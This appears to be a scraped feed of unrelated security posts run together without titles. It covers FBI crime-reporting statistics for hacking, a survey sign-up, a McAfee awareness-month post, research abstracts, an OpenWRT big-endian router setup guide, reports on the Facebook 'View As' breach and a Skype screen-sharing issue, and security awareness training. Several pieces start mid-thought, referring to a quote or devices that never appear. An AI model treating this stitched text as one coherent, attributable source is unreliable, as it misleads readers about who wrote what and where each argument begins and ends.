Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.
Despite being a misquote, I've used it often myself. There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it. The quote always pops to mind, however, because in the case of cybercrime we are doing a phenomenal job of ignoring it in official police statistics. This directly reflects the ability, and the practice, of our state and local law enforcement agencies when it comes to dealing with online crime, hacking, and malware cases. Want to test it yourself? Call your local police department and tell them your computer has a virus. See what happens.
It isn't for lack of law! Every state in the Union has its own computer crime law, and most of them include a category that would broadly be considered "hacking." A quick reference to all 50 states' computer crime laws is here: State Computer Crime Laws. And yet, with a mandate in place to report hacking to the Department of Justice, almost nobody is doing it.
You may be familiar with the Uniform Crime Report (UCR), which attempts to create a standard for measuring crime data across the nation. The UCR has failed to help us at all with cybercrime, because it focused almost exclusively on eight major crimes reported through the Summary Reporting System (SRS):
murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.
The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer. Short-cut URL: https://fbi.gov/cde
To capture other crime types, the Department of Justice has been encouraging the adoption of NIBRS, the National Incident-Based Reporting System. This system primarily focuses on 52 crime categories, and gathers statistics on several more. Most importantly for us, it includes several categories of "Fraud Crimes":
- 2 / 26A / False Pretenses/Swindle/Confidence Game
- 41 / 26B / Credit Card/ATM Fraud
- 46 / 26C / Impersonation
- 12 / 26D / Welfare Fraud
- 17 / 26E / Wire Fraud
- 63 / 26F / Identity Theft
- 64 / 26G / Hacking/Computer Invasion
Unfortunately, despite being endorsed by almost every major law enforcement advocacy group, many states, including my own, are failing to participate. The FBI will retire the SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
Of those seven "fraud type" crimes, the 2017 data is not yet available for detailed analysis. Currently, most of the state data sets, released September 26, 2018, limit the data in each table to only 500 rows. Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3,800 rows of data, you can see how inadequate that filter is for state-wide analysis in fully participating states!
Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes. In 2016, 6,191 law enforcement agencies submitted NIBRS-style data. Of those, 5,074 included at least some "fraud type" crimes. Here's how they broke down by fraud offense. Note, these are not the number of CRIMES committed; these are the number of AGENCIES that submitted at least one of these crimes in 2016:
type - # of agencies - fraud type description
2 - 4315 agencies - False Pretenses/Swindle/Confidence Game
41 - 3956 agencies - Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion
Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016! When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion". To explore on your own, visit the NIBRS 2016 Map. Then under "Crimes Against Property" choose the fraud type you would like to explore. This map shows "Hacking/Computer Invasion." Where a number shows up instead of a pin, zoom the map to see details for each agency.
|Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports|
|Clicking on "Nashville" as an example|
I have requested access to the full data set for 2017. I'll be sure to report here when we have more to share.
What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.
We’re launching a long term study of security practitioners to understand how they approach security, please sign up for our Long Term Security Attitudes and Practices Study here: https://www.surveymonkey.com/r/CZTZY7M.
A few years ago I was in a customer-facing role at a SaaS company, fielding questions about our security practices. The answers we gave were good and reasonable, but not always what the other side was expecting. These discrepancies stemmed from differing risk tolerances, different contexts, and varying approaches to security and technology.
This led to many conversations with our executives about changes to our security practices. Often the question would arise: "What's good enough?" Outside of pointing to ISO 27001/2 and HIPAA, I didn't have an answer. I couldn't tell my executives what would reasonably satisfy our customers' security expectations beyond pointing to the standards. Clearly, though, "standards compliance" wasn't the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices, but there was never any consistency in what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).
Since then I’ve moved on from that company (and changed to an internal role), but those questions raised a more fundamental set for me: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.X, or are we driven by something else? Do we construct policies that are risk-centric? Are we pragmatists or purists? Are we advisers or problem solvers?
These are questions that have stuck with me for a while, and I’ve not found academic papers that answer them, so we’re starting a community-based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.
The study will consist of multiple surveys; once we get going, we’ll invite you to a new survey every two weeks. Each survey will be a few questions long and should take no more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. You aren’t expected to participate in every survey, although that would be nice; in fact, some of the component surveys may not be relevant to you from time to time.
The study will be anonymous in its reporting; we’ll collect an email address and track your unique responses, but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses – which hopefully will allow us to generate insight.
The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.
Everyone is welcome – sign up here to participate: https://www.surveymonkey.com/r/CZTZY7M
Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe, we’ve got to be the ones to stay aware, act responsibly, and take the needed action.
Our Shared Responsibility
This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.
At McAfee, we focus on these matters every day but this month especially, we are linking arms with safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)
8 specific things you can do!
- Become an NCSAM Champion. The National Cyber Security Alliance (NCSA) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up, you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
- Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.
- Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT. on how each family member can protect their devices and information.
- Print it and post it: Print out a STOP. THINK. CONNECT. tip sheet and display it in areas where family members spend time online.
- Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to install a firewall, strengthen your passwords, and make sure your home network is as secure as it can be.
- If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
- Turn on multi-factor authentication. Protect your financial, email, and social media accounts with a second verification step in addition to your password.
- Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.
Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.
The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.
Technological innovation, globalization, and urbanization have made it easier for criminals and terrorists to pose a fresh wave of hazards that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience and efficiency, but also disadvantages, challenges and threats. The purpose of this paper is to explore the crucial elements in combating cybercrime. The paper identifies the following crucial elements: the special perpetrator-victim relationship, time elements, spatial elements, the technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and the rapid increase over the past four decades. These should be emphasized in the fight against cybercrime. The paper further analyzes the phenomenon of rent-seeking that arises from exaggerating insecurity and cybercrime, which can inject misinformation into this battle.
Cloud computing is considered the next logical step in emerging technology for resource outsourcing, information sharing in the physician-patient relationship, and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing, in the search for treatments for humanity’s major illnesses, calls for a pragmatic understanding of its security deterrence techniques. Studies in the cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by healthcare administrators. Healthcare data leaked to unauthorized users tarnishes the image of the individual, the healthcare facility, and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies to explore their adoption, utilization, and provision of security strategies in this innovation. Much emphasis is placed on network, interfaces, data, virtualization, legal, compliance, and governance as key areas of security challenges in cloud computing. Relevant literature is discussed to highlight its prominent findings. The contributions presented provide a practical framework for enhancing security in other disciplines as well.
Securing computer systems against malware is a major concern. Every day millions of malware samples are created, and worse, new malware is highly sophisticated and very difficult to detect, because malware developers use various obfuscation techniques to hide the actual code or behaviour of the malware. It therefore becomes very hard to analyze malware for the useful information needed to design a malware detection system, due to these anti-static and anti-dynamic analysis techniques (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.
Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable for searching, computation, or analysis. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most existing SSE schemes place restrictions on the size and the number of index files to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively large, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on encrypted data stored in an Amazon EMR cluster. The secure searchable inverted index is created on the fly using the Hadoop MapReduce framework during the search process, thus significantly eliminating the need to store document-keyword pairs on the server. The scheme allows dynamic update of the existing index and document collection. Parallel execution of the pre-processing phase reduces processing time at the client. An implementation of our construction is provided in this paper, and experimental results validating the efficacy of our scheme are reported.
Unfortunately, these devices had extraordinarily limited memory (16 megabytes) and even more limited storage (4 megabytes). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.
I'm interested in that device for the simple reason that it has a big-endian CPU.
All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte order as Intel. On the other hand, popular file formats and crypto algorithms use big-endian, so there's some efficiency to be gained by going with that choice.
I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.
The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.
So this post is about the steps I took to get things working for myself.
The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.
The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:
# ifconfig eth0:1 192.168.8.2 netmask 255.255.255.0
The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with a vanilla installation.
I download this using the browser in my Linux VM, then browse to 192.168.8.1, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.
The device boots back up; this time the default address is 192.168.1.1, so again I add another virtual interface to my Linux VM with "ifconfig eth0:2 192.168.1.2 netmask 255.255.255.0" in order to communicate with it.
I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.
The problem is OpenWRT's default WiFi settings: they're somehow interfering with accessing the device. I can't see how from reading the rules, but I'm obviously missing something, so I just go in and nuke the rules. I click on the "WAN" segment in the firewall management page and click "remove". I don't care about security; I'm not putting this on the open Internet or letting guests access it.
To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.
While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.
I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.
DHCP assigns it 10.20.30.46 (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:
C:\> ssh root@10.20.30.46
...because I'm a Windows user and Windows supports ssh now g*dd***it.
OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended differences and came back together again in the latest version. But this older version still goes by the "LEDE" name.
At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.
The way OpenWRT deals with this is called an "overlay", which uses the same technology as Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.
What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.
This process is described on OpenWRT's web page here:
It works well -- but only for systems with more than 4 megs of flash. This is what defeated me before: there's not enough space to add the necessary packages. But with 16 megs on this device there is plenty of space.
The first step is to update the package manager, just like on other Linuxes.
# opkg update
When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flashdrive parts.
[ 5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform
Following the instructions in the above link, I then install those components:
# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras
Simply installing these packages will cause it to recognize the USB drive in dmesg:
[ 10.748961] scsi 0:0:0:0: Direct-Access Samsung Flash Drive FIT 1100 PQ: 0 ANSI: 6
[ 10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 GiB)
[ 10.766689] sd 0:0:0:0: [sda] Write Protect is off
[ 10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[ 10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 10.788139] sda: sda1
[ 10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk
At this point, I need to format the drive with ext4. The correct way of doing this is to connect the drive to my Linux VM and format it there, because in these storage-limited environments OpenWRT doesn't have space for such utilities. But with 16 megs that I'm going to overlay soon anyway, I don't care, so I install the utilities on the device.
# opkg install e2fsprogs
Then I do the normal Linux thing to format the drive:
# mkfs.ext4 /dev/sda1
This blows away whatever was already on the drive.
Now we need to copy over the contents of the existing /overlay. We do that with the following:
# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf -
# umount /mnt
We use tar to copy because, as a backup program, it maintains file permissions and timestamps, so it's better than a plain copy. We don't want to actually create an archive file, but instead use tar in streaming mode. The '-' in one invocation streams the results to stdout instead of writing a file; the '-' in the other invocation streams from stdin. Thus, we never hold a complete copy of the archive, either in memory or on disk: files are untarred as soon as they are tarred up.
At this point we do a blind incantation I really don't understand; I just did it and it works. (Roughly: "block detect" generates a candidate fstab configuration, the first sed flips its "enabled" option from '0' to '1', and the second sed points the mount target at /overlay instead of /mnt/sda1.) The link above has some more text on this, and some things you should check afterwards.
# block detect > /etc/config/fstab; \
sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
sed -i s#/mnt/sda1#/overlay# /etc/config/fstab
At this point, I reboot and log back in. We need to update the package manager again: when we did it the first time, the list was limited to what could fit in our tiny partition. We update again now, with a huge overlay, to get a list of all the packages.
# opkg update
For example, gcc is something like 50 megabytes, so it wouldn't have fit initially, but now it does. It's the first thing I grab, along with git.
# opkg install gcc make git
Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves:
- adding line to /etc/passwd
- adding line to /etc/group
- using the passwd command to change the password for the account
- creating a directory for the user
- chown the user's directory
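The steps above can be sketched as shell commands. This is a hedged sketch, not the exact commands I ran: the username "dev", the UID/GID of 1001, and the ROOT prefix (which lets you dry-run the file edits against a scratch directory) are my choices. On the device you would drop the ROOT prefix and run as root.

```shell
# Dry-run the manual "adduser" steps against a scratch directory.
# On the device: remove ROOT, run as root, and edit the real /etc files.
ROOT=./scratch
mkdir -p "$ROOT/etc" "$ROOT/home"
touch "$ROOT/etc/passwd" "$ROOT/etc/group"

# add a line to passwd and group for the new user "dev" (UID/GID 1001 assumed free)
echo 'dev:x:1001:1001:dev:/home/dev:/bin/ash' >> "$ROOT/etc/passwd"
echo 'dev:x:1001:' >> "$ROOT/etc/group"

# create the home directory
mkdir -p "$ROOT/home/dev"

# on the real device, finish with:
#   passwd dev          # set the account password interactively
#   chown dev:dev /home/dev
```

The passwd and chown steps have to run on the device itself against the live account, so they are left as comments here.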
My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.
I'm missing a git helper for https, so I use the git protocol instead:
$ git clone git://github.com/robertdavidgraham/masscan
$ cd masscan
At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64 megs of RAM, so it'll quickly run out of memory; each compiler process needs around 20 megabytes. So I content myself with two processes:
$ make -j 2
That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.
The final linking step fails. That's because this platform uses different libraries than other Linux versions, the musl library instead of glibc you find on the big distros, or uClibc on smaller distros, like those you'd find on the Raspberry Pi. This is excellent -- I found my first bug I need to fix.
In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:
int x = *(int*)"\1\2\3\4";
It indeed prints the big-endian result, 0x01020304. The bytes would be reversed (0x04030201) if this were little-endian like x86.
Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.
On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.
According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.
Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.
In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.
Facebook reportedly fixed the vulnerability, informed law enforcement of the breach, and is temporarily turning off the "View As" feature while it undergoes a security review. Additionally, the company has reset the access tokens of the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a "View As" look-up in the last year.
Let’s roll back the time machine a century. Imagine you were a rich individual and you had a huge home with assets that needed protection. What was your recourse? Hire macho security guards with stern faces to ward off miscreants. Slowly the human guards gave way to padlocks, combination locks etc. And then the advent of the home security system – independent and isolated. And towards the latter part of the century, integrated systems with a wired or wireless backhaul to a central command. That then evolved into more sophisticated perimeter security with cameras, motion detectors etc.
But even in the face of such dramatic changes in home security, one principle has remained steady. It is all about the perimeter. Secure the entrance and exits and you are safe.
Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.
Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.
While the access tokens of 50 million accounts were taken, Facebook still doesn’t know whether any personal information was gathered or misused from the affected accounts. However, they do expect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as into any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.
As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:
- Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
- Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.
The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.
Facebook announced on Friday that it has suffered a data breach affecting up to 50 million users. According to a report from the New York Times, Facebook discovered the attack on Tuesday and has contacted the FBI. The exploit reportedly enables attackers to take over control of accounts, so, as a precaution, the social network has automatically logged out more than 90 million potentially compromised accounts.
One of the men involved in an ATM jackpotting scheme in January this year is already facing punishment. A district court in Connecticut has sentenced Argenys Rodriguez to just over a year in prison, plus two years of supervised release and $121,355 in restitution, for collaborating on hacks that slipped malware into bank machines and forced the devices to spit out their cash. Rodriguez had pleaded guilty to bank fraud in June and will start his sentence on November 26th.
Source: Department of Justice
A white-hat hacker briefly promised to livestream his bid to hack into Mark Zuckerberg's Facebook account on Sunday, September 30th. "Broadcasting the deletion of Facebook founder Zuck's account," Chang Chi-yuan told his 26,000-plus followers on the social network, adding: "Scheduled to go live." By Friday afternoon, the stream had been cancelled.
Source: Chang Chi-yuan (Facebook)
Home again! Another NDC is down and I talk a little about how the talks were rated and about PubConf (make sure you get to one of these one day!) I've got another couple of weeks at home before any more travel and I'll talk more about the next things as they draw closer.
This week, I'm on my new iPhone (which is very similar to my old iPhone), I'm talking about Uber getting fined, Cloudflare introducing some very cool new things, Firefox Monitor launching on top of the HIBP APIs and my newfound love for the Pi-hole. Seriously, this is a very cool bit of tech and a fun project to build for home. I'll share more over time as I get a better idea of its strengths and weaknesses but for now, yeah, just get one!
- Despite my dislike of Face ID, I've rolled over to the new iPhone Xs (that's a link through to the blog post on the dramas I was having with it)
- Uber got pinged $148M for their breach (their concealment of it deserves a big penalty, but there's been no personal impact from it)
- Cloudflare is making bandwidth cheap (the Bandwidth Alliance could be awesome for costs!)
- Plus, they're becoming a domain registrar (yet another way of making the platform more accessible and driving down costs)
- Mozilla launched Firefox Monitor (yes, it's effectively another skin on HIBP, but it massively expands the reach of the service)
- Pi-hole - get one! (so impressed with this little beaudy!)
- And here's the ad blockers blog post just for good measure (I'd really like to see a more responsible approach on their behalf)
- DigiCert is sponsoring my blog this week (they're really putting a lot of work into IoT security lately, check 'em out!)
Cisco today disclosed 13 vulnerabilities in its IOS and IOS XE switch and router operating software that the company said should be patched as soon as possible.
The vulnerabilities were detailed in Cisco’s twice-yearly dump of IOS disclosures. All carry a High Impact security rating, and users should evaluate and apply the fixes quickly.
The company said this particular batch of issues could let an attacker gain elevated privileges for an affected device or cause a denial of service (DoS) on an affected device.
Here at Heimdal Security, we spread our time between providing security tools to prevent serious attacks like ransomware or next-gen malware and providing the education necessary to keep personal data safe across various platforms and devices.
Sometimes, it becomes obvious that tools and education alone won’t keep users truly safe online, nor will they protect their privacy. Sometimes, ubiquitous, extremely popular services release features that truly boggle the mind. Skype for Business is one such service.
This week, we discovered a serious security risk and privacy breach with the Skype for Business app. It was not related to hacking and other cyber-attacks but a pure “feature”, whose purpose and value we haven’t yet been able to decipher.
If you do a Skype for Business call with “screen-sharing” turned on, be prepared to share more than what you wanted.
Once the person who started screen-sharing hangs up, the desktop-sharing function will continue. The people at the other end of the line will still see what’s happening there.
If the person who had hosted the session does not notice the tiny warning at the top, they will continue sharing whatever they’re doing on the screen. Spreadsheets with sensitive financial data, inbox contents, private messages on Facebook, all of them will be seen by the other person.
Had a cybercriminal participated in a conversation like this, they would have had a field day with the information obtained. In some industries, a competitor could do serious damage with the amount of information on display.
We thought that we had stumbled upon a serious security flaw. Imagine our surprise when, after a few seconds of Googling the issue and thinking about contacting Microsoft, we came across this thread. No, screen sharing after ending a call is a “feature, not a bug”. Never mind the fact that a regular Skype user first calls someone to start a meeting, then opens a presentation, then closes the call and assumes that the entire interaction ended.
Why would someone possibly want their screen to remain visible to the other person even though the dialogue has ended? Even if, by chance, that were the case, the tiny ribbon that lets you know screen-sharing is still active has such an unobtrusive design that a regular user will almost certainly miss it. For such a security-sensitive feature, you’d think neon colors were in order. Certainly, a pleasant design should not be the only priority for Skype for Business.
After all, the people using it do have plenty of sensitive information that should not leak.
Here is what the caller who initiated screen-sharing can see once he/she hangs up.
Here is what’s visible to the ones that just left that call. Spoiler: it’s everything the initial caller is currently doing.
And, finally, this is the placement of the ribbon that was designed to let the user know their screen is still being broadcast. It’s almost black, on top of a browser bar of the same color. If someone had a secondary display and they were to continue working on the screen with the Skype for Business window, it would have been almost impossible to spot that message.
Microsoft’s response? “It’s an expected behavior,” said a customer representative. He followed that with an invitation to “vote for this feedback” at another link, and a recommendation to “close the Skype for Business chat window to end Skype call and screen sharing at the same time.”
Yes, the official suggestion is to close the entire window, not press the button that’s for ending the call.
Give it a bit more time and, instead of customer support flagging the bad user interface (UI) design and the developers fixing it, someone will tell you to put a sticker on your webcam if you want to stop broadcasting. This is to say nothing of what a huge GDPR infringement this Skype for Business bug could be. Some experts point out that even sharing usernames in unencrypted communications or on screens can be against the General Data Protection Regulation.
Microsoft is not alone in this and could probably pin this one on miscommunication, not bad intentions.
What users have to do is to secure their device with the essential security layers and remain updated with current news, so they can act swiftly and protect themselves and their valuable data.
The post Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined appeared first on Heimdal Security Blog.
Posted under: Research and Analysis
Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.
So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.
To solidify the concepts, let’s go through a scenario which works through the process step by step. Let’s say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in its phishing simulation over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well-crafted drive-by attack which would have worked against the entire senior team.
So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!
Start with Urgency
As mentioned, your company has a well-established security program. So you can hit the ground running, using your existing baseline security data. Next identify the most significant risks and triage immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit you can start to work on training employees on a critical issue right away.
Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.
Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.
It’s a balance between being overly heavy-handed and the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be tested periodically. That’s the continuous part of the approach – it’s not a one-time thing.
Introduce Contextual Training
As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.
Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.
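The alert-to-training routing described above can be sketched in a few lines. Everything here is hypothetical: the alert format, module names, and catalog are illustrative, not any particular vendor's API.

```python
# Hypothetical sketch: route alerts from email/web/DNS security services to a
# short contextual training module. Names and formats are illustrative only.

TRAINING_CATALOG = {
    "phishing_click": "email-security-refresher",  # 2-3 minute module
    "malicious_site": "web-security-refresher",
}

def route_alert(alert):
    """Map a security alert to a same-day training assignment, or None."""
    module = TRAINING_CATALOG.get(alert.get("type"))
    if module is None:
        return None  # not a trainable event
    return {
        "employee": alert["employee"],
        "module": module,
        "due": "end-of-day",  # contextual but flexible: complete it that day
    }

print(route_alert({"type": "phishing_click", "employee": "jdoe"}))
```

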